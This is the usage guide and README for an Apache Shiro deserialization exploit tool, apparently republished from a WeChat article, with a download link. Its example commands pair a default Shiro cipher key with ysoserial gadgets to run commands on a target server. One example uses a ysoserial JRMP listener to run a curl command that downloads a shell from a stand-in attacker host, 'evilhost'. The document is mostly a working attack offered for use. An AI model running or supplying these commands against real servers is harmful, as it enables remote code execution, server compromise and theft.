Python 2.7
requests
JDK 1.8
usage: shiro_exploit.py [-h] -u URL [-t TYPE] [-g GADGET] [-p PARAMS] [-k KEY]

OPTIONS:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target url.
  -t TYPE, --type TYPE  Check or Exploit. Check :1 , Exploit:2 , Find gadget:3
  -g GADGET, --gadget GADGET
                        gadget
  -p PARAMS, --params PARAMS
                        gadget params
  -k KEY, --key KEY     CipherKey

Example:
  python shiro_exploit.py -u target
  python shiro_exploit.py -u http://target/ -t 3 -p "ping -c 2 {dnshost}" -k "kPH+bIxk5D2deZiIxcaaaA=="
  java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 'curl evilhost/shell -o shell'
  python shiro_exploit.py -u http://target/ -t 2 -g JRMPClient -p "remote_host:1099" -k "kPH+bIxk5D2deZiIxcaaaA=="

Download
https://github.com/insightglacier/Shiro_exploit
Originally published on the WeChat official account 扫地僧的茶饭日常: [Tools] Apache Shiro Deserialization Vulnerability Detection and Exploitation Tool